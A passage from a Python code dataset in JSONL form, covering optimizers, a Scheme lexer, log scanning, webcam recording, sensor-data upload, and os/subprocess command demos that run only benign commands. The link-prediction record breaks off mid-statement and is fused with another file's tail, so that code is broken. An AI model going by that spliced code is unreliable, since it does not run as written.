values\r\n    x = [12,10,10,14,18,7]\r\n    # corresponding y axis values\r\n    y = [12,14,11,15,20,16]\r\n\r\n    partner_name = 'Indiana'\r\n\r\n    generate_plot(x, y, partner_name)\r\n\r\n    print(\"Complete!\")\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n    ","sub_path":"plottester.py","file_name":"plottester.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"293170241","text":"@unittest.skipIf((not TEST_NUMPY), 'Numpy not found')\ndef test_beta_log_prob(self):\n    for _ in range(100):\n        alpha = np.exp(np.random.normal())\n        beta = np.exp(np.random.normal())\n        dist = Beta(alpha, beta)\n        x = dist.sample()\n        actual_log_prob = dist.log_prob(x).sum()\n        expected_log_prob = scipy.stats.beta.logpdf(x, alpha, beta)[0]\n        
self.assertAlmostEqual(actual_log_prob, expected_log_prob, places=3)","sub_path":"Data Set/bug-fixing-5/54e11639f9b8abacd6a67274126cd097bb4af6ca--fix.py","file_name":"54e11639f9b8abacd6a67274126cd097bb4af6ca--fix.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"630732082","text":"import xdrlib\nimport numpy as np\nimport pandas as pd\nimport sensorcloud as sc\nimport logging\n\n\ndef processAPSFile(file):\n    logger = logging.getLogger('solaroad.aps')\n\n    x = pd.read_csv(file, delimiter=',', skip_blank_lines=True, na_values='-')\n    x = x.dropna()\n    x = x.drop_duplicates(subset=['Reporting Time'])\n    index_time = pd.to_datetime(x['Reporting Time'], format=\"%Y-%m-%d %H:%M:%S\")\n    x.index = index_time\n    for key in x.keys():\n        if 'Unnamed' in key:\n            del (x[key])\n\n    for inverterId in x['Inverter ID'].unique():\n        logger.debug('======================== Now processing %s ========================', inverterId)\n        y = x.loc[x['Inverter ID'] == inverterId].copy()  # copy so the column deletion below does not touch x\n        del (y['Inverter ID'])\n\n        y = y.resample('5min').mean().interpolate(method='pad')\n\n        server, auth_token = sc.authenticate()\n        deviceId = sc.getDeviceId()\n\n        ctr = 0\n        total_steps = np.round(len(y) / sc.MAX_POINTS) + 1\n        while ctr < total_steps:\n            sp = ctr * sc.MAX_POINTS\n            tmp = y.iloc[sp:sp + sc.MAX_POINTS - 1, :]\n            logger.debug('--------------------- RECORD %s/%s ------------------------------', ctr + 1, total_steps)\n\n            sc.addSensor(server, auth_token, deviceId, inverterId, inverterId, inverterId, inverterId)\n\n            logger.debug('Now uploading %s', inverterId)\n\n            for key in tmp.keys():\n                packer = xdrlib.Packer()\n                packer.pack_int(1)  # version 1\n\n                packer.pack_enum(sc.SECONDS)\n                packer.pack_int(300)\n\n                POINTS = len(tmp)\n                packer.pack_int(POINTS)\n\n                channel = '_'.join(key.replace('(', '').replace(')', '').split(' '))\n                sc.addChannel(server, auth_token, deviceId, inverterId, channel, channel, channel)\n\n                logger.debug('Now uploading %s', channel)\n\n                for item in tmp[key].items():\n                    val = item[1]\n                    timestamp = item[0].to_pydatetime().timestamp() * 1000000000  # seconds -> nanoseconds\n                    packer.pack_hyper(int(timestamp))\n                    packer.pack_float(float(val))\n\n                data = packer.get_buffer()\n                sc.uploadData(server, auth_token, deviceId, inverterId, channel, data)\n            ctr = ctr + 1\n","sub_path":"apsMECFileProcessor.py","file_name":"apsMECFileProcessor.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"552954435","text":"# File: LogChecker.py\r\n\r\nimport os\r\n\r\nchoice = \"yes\"\r\nwhile(choice.lower() != \"no\"):\r\n    fileName = input(\"What is the name of the file? (api,esb,fp,np-server) : \")\r\n\r\n    fileEnv = input(\"What is the env of the file? (qa1,dev,qaperf2) : \")\r\n\r\n    fileLoc = input(\"What is the loc of the file? 
(SAC,am1) : \")\r\n\r\n    path = \"/Users/rbattula/Documents/apache-access-\" + fileName + \"-\" + fileEnv + \"-\" + fileLoc\r\n    os.chdir(path)\r\n\r\n    beginDate = input(\"Enter the start date (yyyy-mm-dd)\")\r\n\r\n    beginMonth = beginDate[5:7]\r\n\r\n    beginDay = beginDate[8:]\r\n\r\n\r\n    endDate = input(\"Enter the end date (yyyy-mm-dd)\")\r\n\r\n    endMonth = endDate[5:7]\r\n\r\n    endDay = endDate[8:]\r\n\r\n\r\n    # days per month (February is treated as 28 days; leap years are not handled)\r\n    daysInMonth = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\r\n\r\n    # build the list of \"MM-DD\" strings covered by the date range (spans at most one month boundary)\r\n    dates = list()\r\n    if(int(beginMonth) == int(endMonth)):\r\n        for i in range(int(beginDay), int(endDay) + 1):\r\n            dates.append(beginMonth + \"-\" + str(i).zfill(2))\r\n    else:\r\n        for i in range(int(beginDay), daysInMonth[int(beginMonth)] + 1):\r\n            dates.append(beginMonth + \"-\" + str(i).zfill(2))\r\n        for j in range(1, int(endDay) + 1):\r\n            dates.append(endMonth + \"-\" + str(j).zfill(2))\r\n\r\n\r\n    # scan every log file whose name contains one of the dates for warning/error/exception lines\r\n    keywords = (\"warn\", \"WARN\", \"err\", \"ERR\", \"error\", \"Error\", \"ERROR\", \"exception\", \"Exception\", \"EXCEPTION\")\r\n    folder = os.listdir(path)\r\n    for fileNames in folder:\r\n        for days in dates:\r\n            if(days in fileNames):\r\n                for line in open(fileNames):\r\n                    if any(keyword in line for keyword in keywords):\r\n                        print(line)\r\n    choice = input(\"Would you like to choose another file to search? 
(yes or no)\")\r\n    if(choice.lower() == \"no\"):\r\n        print(\"Program has now ended.\")\r\n","sub_path":"LogChecker.py","file_name":"LogChecker.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"583817310","text":"import cv2\n\ndef showcam(mirror=False):\n    camera = cv2.VideoCapture(0)\n\n    if not camera.isOpened():\n        print(\"UNABLE TO READ CAMERA\")\n\n    frame_width = int(camera.get(3))\n    frame_height = int(camera.get(4))\n\n    out = cv2.VideoWriter('video.avi', cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width, frame_height))\n    \n    while True:\n        ret, img = camera.read()\n\n        if mirror:\n            img = cv2.flip(img, 1)\n\n        if ret:\n            out.write(img)\n            cv2.imshow('WEBCAM', img)\n\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break  # press 'q' to quit\n        else:\n            break\n\n    camera.release()\n    out.release()\n    \n    cv2.destroyAllWindows()\n\ndef main():\n    showcam(mirror=True)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Step-3/recordvideo.py","file_name":"recordvideo.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"206110559","text":"import numpy as np\n\n\ndef common_update(weight, lr, d_w):\n    # vanilla gradient descent step\n    weight -= lr * d_w\n\n\nclass momentum_update:\n    def __init__(self):\n        self.v = 0\n        self.mu = 0.99\n\n    def update(self, x, d_x, lr):\n        # accumulate velocity, then step along it\n        self.v = self.mu * self.v - lr * d_x\n        x += self.v\n\n\nclass nesterov_momentum:\n    def __init__(self, v=None, mu=None):\n        if v is None:\n            self.v = 0\n        else:\n            self.v = v\n        if mu is None:\n            self.mu = 0.99\n        else:\n            self.mu = mu\n\n    def update(self, x, d_x, lr):\n        v_prev = self.v\n        self.v = self.mu * self.v - lr * d_x\n        x += -self.mu * v_prev + (1 + self.mu) * self.v\n\n\nclass Adagrad:\n    def __init__(self, eps=None):\n        self.cache = 0\n        if eps is None:\n            self.eps = 1e-8\n        else:\n            self.eps = eps\n\n    def update(self, x, d_x, lr):\n        # accumulate squared gradients; the cache must grow monotonically\n        self.cache += d_x ** 2\n        x += -lr * d_x / (np.sqrt(self.cache) + self.eps)\n\n\nclass RMSprop:\n    def __init__(self, eps=None, decay_rate=None):\n        self.cache = 0\n        if eps is None:\n            self.eps = 1e-8\n        else:\n            self.eps = eps\n        if decay_rate is None:\n            self.decay_rate = 0.99\n        else:\n            self.decay_rate = decay_rate\n\n    def update(self, x, d_x, lr):\n        self.cache = self.decay_rate * self.cache + (1 - self.decay_rate) * d_x ** 2\n        x += -lr * d_x / (np.sqrt(self.cache) + self.eps)\n\n\nclass Adam:\n    def __init__(self, eps=None, beta1=None, beta2=None):\n        if eps is None:\n            self.eps = 1e-8\n        else:\n            self.eps = eps\n        if beta1 is None:\n            self.beta1 = 0.9\n        else:\n            self.beta1 = beta1\n        if beta2 is None:\n            self.beta2 = 0.999\n        else:\n            self.beta2 = beta2\n        self.m = 0\n        self.v = 0\n\n    def update(self, x, d_x, lr):\n        # exponential moving averages of the gradient and its square (bias correction omitted)\n        self.m = self.beta1 * self.m + (1 - self.beta1) * d_x\n        self.v = self.beta2 * self.v + (1 - self.beta2) * (d_x ** 2)\n        x += -lr * self.m / (np.sqrt(self.v) + self.eps)\n","sub_path":"framework/weights_update.py","file_name":"weights_update.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"605036278","text":"import numpy as np\n\nimport torch\n\nimport logging\n\nfrom mlcore.callback import Callback\n\n\nclass FilterSELFManager(Callback):\n    def __init__(\n        self,\n        
path,\n        cache_reader,\n        cache_writer,\n        filter_dataloader,\n        alpha=0.5,\n        patience=10,\n        device=\"cpu\",\n        metric=\"loss\",\n        target=\"minimizing\",\n        index=\"id\",\n    ):\n\n        self._alpha_filter = alpha\n        self._iter = 0\n\n        self.path = path\n        self.cache_reader = cache_reader\n        self.cache_writer = cache_writer\n        self.filter_dataloader = filter_dataloader\n        self.device = device\n        self.index = index\n        self.patience = patience\n        self._patience_step = 0\n\n        self._metric = metric\n        self._target = target\n        self._best_target = np.finfo(np.float32).max if target == \"minimizing\" else np.finfo(np.float32).min\n\n    def on_test_end(self, **kwargs):\n        if self._metric not in kwargs:\n            raise ValueError(f\"metric '{self._metric}' not found in test results: {list(kwargs.keys())}\")\n\n        alpha = min(1 - 1 / (self._iter + 1), self._alpha_filter)\n\n        self._patience_step -= 1\n\n        # skip filtering while the monitored metric is still improving\n        target = kwargs[self._metric]\n        improved = target < self._best_target if self._target == \"minimizing\" else target > self._best_target\n        if improved:\n            logging.info(\n                f\"FilterSELFManager: skip filtering target:{target} improved on self._best_target:{self._best_target}\"\n            )\n            self._best_target = target\n            return {\n                \"filter/iter\": self._iter,\n                \"filter/alpha\": alpha,\n                \"filter/best_target\": self._best_target,\n                \"filter/patience\": self._patience_step,\n            }\n\n        if self._patience_step > 0:\n            logging.info(f\"FilterSELFManager: skip filtering patience:{self._patience_step}\")\n            return {\n                \"filter/iter\": self._iter,\n                \"filter/alpha\": alpha,\n                \"filter/best_target\": self._best_target,\n                \"filter/patience\": self._patience_step,\n            }\n\n        # reset alpha for mean trainer\n        if hasattr(self.trainer, \"_mean_teacher_step\"):\n            self.trainer._mean_teacher_step = 0\n\n        logging.info(f\"FilterSELFManager: start filtering with alpha:{alpha} for iter:{self._iter}\")\n        with self.cache_reader() as reader:\n            with self.cache_writer() as writer:\n                for batch_id, sample in enumerate(self.filter_dataloader):\n                    result = self.trainer.val_step(sample, device=self.device)\n                    prediction = result[\"model_output\"][\"prediction\"].cpu().numpy()\n                    for batch_element in range(prediction.shape[0]):\n                        cache_id = sample[self.index][batch_element]\n                        # Compute moving average of all predictions\n                        old_prediction = reader.read(cache_id)\n\n                        if old_prediction is None:\n                            old_prediction = np.zeros_like(prediction[batch_element])\n                        else:\n                            old_prediction = old_prediction[\"prediction\"]\n\n                        average_prediction = old_prediction * alpha + (1 - alpha) * prediction[batch_element]\n\n                        # print(average_prediction)\n                        writer.write(cache_id, [\"prediction\"], [average_prediction])\n\n        self._patience_step = self.patience\n        self._iter += 1\n        return {\n            \"filter/iter\": self._iter,\n            \"filter/alpha\": alpha,\n            \"filter/best_target\": self._best_target,\n            \"filter/patience\": self._patience_step,\n        }\n\n    def state_dict(self, **kwargs):\n        return {\n            \"alpha_filter\": self._alpha_filter,\n            \"iter\": self._iter,\n            \"lowest_loss\": self._best_target,\n            \"patience_step\": self._patience_step,\n        }\n\n    def load_state_dict(self, data: dict):\n        self._alpha_filter = data[\"alpha_filter\"]\n        self._iter = data[\"iter\"]\n        self._best_target = data[\"lowest_loss\"]\n        self._patience_step = data[\"patience_step\"]\n\n\nclass 
FilterSELFIterableDataset(torch.utils.data.IterableDataset):\n    def __init__(\n        self,\n        dataset,\n        cache_reader,\n        filter_method,\n        filtered_delete=False,\n        random_deletion=None,\n        random_deletion_start=False,\n        index=\"id\",\n    ):\n        self.dataset = dataset\n        self.cache_reader = cache_reader\n        self.filter_method = filter_method\n        self.filtered_delete = filtered_delete\n        self.random_deletion = random_deletion\n        self.random_deletion_start = random_deletion_start\n        self.index = index\n\n    def handle_sample(self, reader, sample):\n        # decide whether to keep, down-weight, or drop a sample based on its cached prediction\n        if \"loss_weight\" in sample:\n            loss_weight = sample[\"loss_weight\"]\n        else:\n            loss_weight = torch.tensor(1, dtype=torch.float32)\n\n        if self.random_deletion is not None:\n            loss_weight = (torch.rand(size=[]) > self.random_deletion).float()\n\n        if sample[self.index] not in reader:\n            if self.random_deletion_start:\n                loss_weight = (torch.rand(size=[]) > self.random_deletion_start).float()\n            return {**sample, \"loss_weight\": loss_weight}\n        entry = reader.read(sample[self.index])\n        if entry is None:\n            return {**sample, \"loss_weight\": loss_weight}\n\n        prediction = entry[\"prediction\"]\n        # TODO top_k or equal argmax\n        # if prediction not in x['concept_ids'].tolist():\n        #     continue\n        decision = self.filter_method(sample, prediction)\n        if decision:\n            # print(f\"{decision} {sample['id']} {sample['label']} {sample['concept_ids']} {prediction}\")\n            if self.filtered_delete:\n                return None\n            else:\n                return {**sample, \"loss_weight\": torch.tensor(0, dtype=torch.float32)}\n\n        return {**sample, \"loss_weight\": loss_weight}\n\n    def __iter__(self):\n        with self.cache_reader() as reader:\n            for x in self.dataset:\n                result = self.handle_sample(reader, x)\n                if result is None:\n                    continue\n                yield result\n\n    def __len__(self):\n        # length of the underlying dataset; filtering with filtered_delete may yield fewer samples\n        return len(self.dataset)\n\n\nclass SplitIterableDataset(torch.utils.data.IterableDataset):\n    def __init__(self, dataset, return_unlabeled=False):\n        self.dataset = dataset\n        self.return_unlabeled = return_unlabeled\n\n    def __iter__(self):\n        for x in self.dataset:\n            if self.return_unlabeled:\n                if x[\"loss_weight\"] == 0:\n                    yield x\n            else:\n                if x[\"loss_weight\"] == 1:\n                    yield x\n\n    def __len__(self):\n        # length of the underlying dataset; the split may yield fewer samples\n        return len(self.dataset)\n","sub_path":"gan/mlcore/filter/filter_self.py","file_name":"filter_self.py","file_ext":"py","file_size_in_byte":7530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"37041783","text":"# Import required libraries\r\nimport ply.lex as lex\r\n\r\n# Create a dictionary of reserved words.\r\nreserved = {\r\n    'if' : 'IF',\r\n    'cond' : 'COND',\r\n    'else' : 'ELSE',\r\n    'case' : 'CASE',\r\n    'lambda' : 'LAMBDA',\r\n    'define' : 'DEFINE',\r\n    'and' : 'AND',\r\n    'or' : 'OR',\r\n    'do' : 'DO',\r\n    'cons' : 'CONS',\r\n    'cdr' : 'CDR',\r\n    'car' : 'CAR',\r\n    'last' : 'LAST',\r\n    'list' : 'LIST',\r\n    'remainder' : 'REMAINDER',\r\n    'log' : 'LOG',\r\n    'read' : 'READ',\r\n    'display' : 'DISPLAY',\r\n    }\r\n\r\n# Define tokens and add the reserved words as a list.\r\ntokens = [\r\n    'EQQUES',\r\n    'NEQQUES',\r\n    'ID',\r\n    'ADD',\r\n    'MINUS',\r\n    'MULTIPLY',\r\n    'DIVIDE',\r\n    'EQUALS',\r\n    'GREATER',\r\n    'LESS',\r\n    'GREATER_EQUAL',\r\n    'LESS_EQUAL',\r\n    'OPEN_PAR',\r\n    'CLOSE_PAR',\r\n    'OPEN_BRA',\r\n    'CLOSE_BRA',\r\n    'OPEN_KEY',\r\n    'CLOSE_KEY',\r\n    'COMMA',\r\n    'TRUE',\r\n    'FALSE',\r\n    'SPACE',\r\n    'NEW_LINE',\r\n    'COMMENT',\r\n    'COM_BLOCK',\r\n    'INT',\r\n    'FLOAT',\r\n    'CHARACTER',\r\n    'STRING',\r\n    ] + list(reserved.values())\r\n\r\n# Define all the token specifications in order of importance (usually the length of the token).\r\nt_ignore_COM_BLOCK = 
r'\\#\\|(.|\\n|\\t)*\\|\\#'\r\n\r\nt_ADD = r'\\+'\r\nt_MINUS = r'\\-'\r\nt_MULTIPLY = r'\\*'\r\nt_DIVIDE = r'\\/'\r\nt_EQUALS = r'\\='\r\nt_GREATER_EQUAL = r'\\>\\='\r\nt_GREATER = r'\\>'\r\nt_LESS_EQUAL = r'\\<\\='\r\nt_LESS = r'\\<'\r\nt_OPEN_PAR = r'\\('\r\nt_CLOSE_PAR = r'\\)'\r\nt_OPEN_BRA = r'\\['\r\nt_CLOSE_BRA = r'\\]'\r\nt_OPEN_KEY = r'\\{'\r\nt_CLOSE_KEY = r'\\}'\r\nt_COMMA = r'\\,'\r\nt_TRUE = r'\\#t'\r\nt_FALSE = r'\\#f'\r\nt_CHARACTER = r'\\'[^\\']+\\''\r\nt_STRING = r'\\\"[^\"]*\\\"'\r\n\r\n# Ignore elements that are going to be in the code but aren't required.\r\nt_ignore_SPACE = r'\\ '\r\nt_ignore_TAB = '\\\\t'\r\nt_ignore_ENTER = '\\\\n'\r\nt_ignore_COMMENT = r'\\;.*'\r\n\r\ndef t_EQQUES(t):\r\n    r'eq\\?'\r\n    return t\r\n\r\ndef t_NEQQUES(t):\r\n    r'neq\\?'\r\n    return t\r\n\r\n# Define a regular expression to detect float numbers, located above the integer identifier to prioritize it.\r\ndef t_FLOAT(t):\r\n    r'\\d+\\.\\d+'\r\n    t.value = float(t.value)\r\n    return t\r\n\r\n# Define a regular expression to detect integer numbers.\r\ndef t_INT(t):\r\n    r'\\d+'\r\n    t.value = int(t.value)\r\n    return t\r\n\r\n# Define a regular expression to detect identifiers.\r\ndef t_ID(t):\r\n    r'[a-zA-Z_][a-zA-Z_0-9]*'\r\n    t.type = reserved.get(t.value,'ID')\r\n    return t\r\n\r\n# Define the error method for invalid characters.\r\ndef t_error(t):\r\n    t.type = \"ERROR\"\r\n    print(\"ERROR: Illegal character '%s'\" % t.value[0])\r\n    t.value = t.value[0]\r\n    t.lexer.skip(1)\r\n    return t\r\n\r\n'''def t_error(t):\r\n    print(\"ERROR: Illegal character '%s'\" % t.value[0])\r\n    t.lexer.skip(1)'''\r\n\r\n# Create lexer.\r\nlexer = lex.lex()\r\n#string = \"'a' ' ' '/' read display '4' = '=' \\\"b\\\" cond \\\"Simple \\tsentence with issues\\\" if\\tIF cond else case lambda\\ndefine and or do cons cdr car#|Bloque de comentarios\\nIgnorame pls\\tsi eres tan amable\\n|#last list remainder log id id1 id2 id_ id_2_3_4 id_test_3 iDF id_Fg4_5f +-/*;Comentario, ignorame pls\\n>=><=<()[]{},#t #f eq? 
neq?\"\r\n#lexer.input(string)\r\n'''\r\nwhile True:\r\n    tok = lexer.token()\r\n    if not tok:\r\n        break\r\n    if tok.type == \"ERROR\":\r\n        break\r\n    print(tok)\r\n'''\r\n","sub_path":"scheme_lexer.py","file_name":"scheme_lexer.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"355486092","text":"from sklearn.cluster import KMeans\nimport numpy as np\nimport pickle\n# https://stackoverflow.com/questions/27889873/clustering-text-documents-using-scikit-learn-kmeans-in-python\n\n# fine-tuning number of clusters: 5, then 4 and 6\nNUM_CLUSTERS = 8\n\nwith open('data/index_to_vocab.pkl', 'rb') as index_vocab_pkl:\n\tindex_to_vocab_dict = pickle.load(index_vocab_pkl)\ndoc_by_vocab_mat = np.load(\"data/doc_by_vocab.npy\")\n\nmodel = KMeans(n_clusters=NUM_CLUSTERS, random_state=9965130, init='k-means++', max_iter=1000, n_init=10)\nmodel.fit(doc_by_vocab_mat)\n\n# print(\"Top terms per cluster:\")\norder_centroids = model.cluster_centers_.argsort()[:, ::-1]\nrelevant_keywords = []\nfor i in range(NUM_CLUSTERS):\n    # print (\"Cluster %d:\" % i)\n    cluster = set()\n    for ind in order_centroids[i, :10]:\n        # print (' %s' % index_to_vocab_dict[ind])\n        cluster.add(index_to_vocab_dict[ind])\n    print()\n    relevant_keywords.append(cluster)\n    print(cluster)\n\n# output [ sets(keywords) ] to go to a pre-mapped list in search.py\nwith open(\"data/query_expansion_clusters.pkl\", \"wb+\") as file:\n\tpickle.dump(relevant_keywords, file)","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"343509753","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 27 23:29:35 2017\r\n\r\n@author: shwetank\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.metrics.pairwise import cosine_similarity as cs\r\nfrom sklearn.metrics import jaccard_similarity_score as js\r\nfrom sklearn import svm\r\nfrom sklearn.metrics import confusion_matrix\r\nimport warnings\r\nimport random\r\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \r\n\r\nprint(\"Reading Adjacency Matrix\")\r\nA = pd.read_csv(\"adjMat.csv\", header=None)\r\n\r\nno_edges = A.sum().sum()\r\nno_nodes = A.shape[1]\r\n\r\n###################### Basic Feature Definitions ##########################\r\nprint(\"Defining basic IB/OB features and reading exp(A)\")\r\nA = A.values \r\nexpA = pd.read_csv(\"exp_mat.csv\",header = None)\r\nexpA = expA.values\r\n#expA_n = expA/(expA.max().max())\r\n#expA_n = expA_n.round(5)\r\nIB_exp = np.sum(expA,axis = 0) ### columnwise inboundness\r\nOB_exp = np.sum(expA,axis = 1) ### rowwise outboundness\r\nIB_adj = np.sum(A,axis = 0)\r\nOB_adj = np.sum(A,axis = 1)\r\n\r\ncntrl = [] \r\nfor i in range(no_nodes): \r\n    cntrl.append(expA[i][i])\r\n\r\nprint(\"Start appending features\")\r\n\r\nfeat_train = []\r\nlab_train = []\r\nfor i in range(no_nodes):\r\n    for j in range(no_nodes):\r\n        lab_train.append(A[i][j])\r\n        temp = []\r\n        #node features\r\n        \r\n        temp.append(IB_exp[i])\r\n        temp.append(IB_exp[j])\r\n        temp.append(OB_exp[i])\r\n        temp.append(OB_exp[j]) \r\n        temp.append(cntrl[i])\r\n        temp.append(cntrl[j])\r\n        #edge features\r\n        temp.append(expA[i][j])\r\n        \r\n        temp.append(IB_adj[i])\r\n        temp.append(IB_adj[j])\r\n        temp.append(OB_adj[i])\r\n        temp.append(OB_adj[j])\r\n        foo = cs(A[i].reshape(1, -1), A[j].reshape(1, -1))  # cosine_similarity expects 2D arrays\r\n        temp.append(foo[0][0])\r\n        temp.append(js(A[i],A[j]))\r\n        \r\n        feat_train.append(temp)\r\n\r\n\r\nprint(\"Calculating training and testing feature\")\r\nedge_size = 2430\r\nper = 0.8 \r\nfeat_ones = []\r\nfeat_zeros = []\r\nlab_ones = 
[]\nlab_zeros = []\ncount = 0\nfor i in range(no_nodes):\n for j in range(no_nodes):\n if i==j:\n continue\n if lab_train[300*i+j]==1:\n feat_ones.append(feat_train[300*i+j])\n lab_ones.append(1)\n else:\n if count output\n os.system(\"ipconfig\") \n print( os.system('ls -la') )\n\n\n # 'popen' can make a connection to std input and output\n stream = os.popen(\"ipconfig\")\n print(stream.read())\n\n stream = os.popen('ls -la')\n print(stream.read())\n\n # subprocss open\n # subprocess.run([\"ls\", \"l\", \"//c/\"])\n print(subprocess.Popen(\"echo Hello world-d''!\", shell=True, stdout=subprocess.PIPE).stdout.read())\n\n # It will return, after the sub process complete\n print(subprocess.call(\"echo Hello world!\", shell=True))\n\n res = 1\n\nif __name__ == \"__main__\":\n\n main()\n\n","sub_path":"Python35/standard lib/test_os.py","file_name":"test_os.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}